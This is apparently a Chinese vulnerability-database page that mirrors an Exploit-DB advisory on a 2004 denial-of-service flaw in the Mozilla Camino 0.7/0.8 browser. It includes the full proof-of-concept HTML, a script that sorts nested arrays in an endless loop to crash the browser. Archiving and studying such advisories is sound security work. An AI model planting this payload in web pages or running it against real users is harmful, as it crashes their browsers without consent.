Mozilla Camino Web Browser 0.7/0.8 – Infinite Array Sort Denial of Service

Mozilla Camino Web Browser 0.7/0.8 – Infinite Array Sort Denial of Service

漏洞ID 1054770 漏洞类型
发布时间 2004-11-25 更新时间 2004-11-25
图片[1]-Mozilla Camino Web Browser 0.7/0.8 – Infinite Array Sort Denial of Service-安全小百科CVE编号 N/A
图片[2]-Mozilla Camino Web Browser 0.7/0.8 – Infinite Array Sort Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24781
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/11761/info

Mozilla Camino Web browser is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs an infinite JavaScript array sort operation. It is conjectured that this will only result in a denial of service and is not further exploitable to execute arbitrary code, though this has not been confirmed.

<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>

相关推荐: VocalTec VGW120/ VGW480 Telephony Gateway Remote H.225 Denial Of Service Vulnerability

VocalTec VGW120/ VGW480 Telephony Gateway Remote H.225 Denial Of Service Vulnerability 漏洞ID 1098406 漏洞类型 Failure to Handle Excepti…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享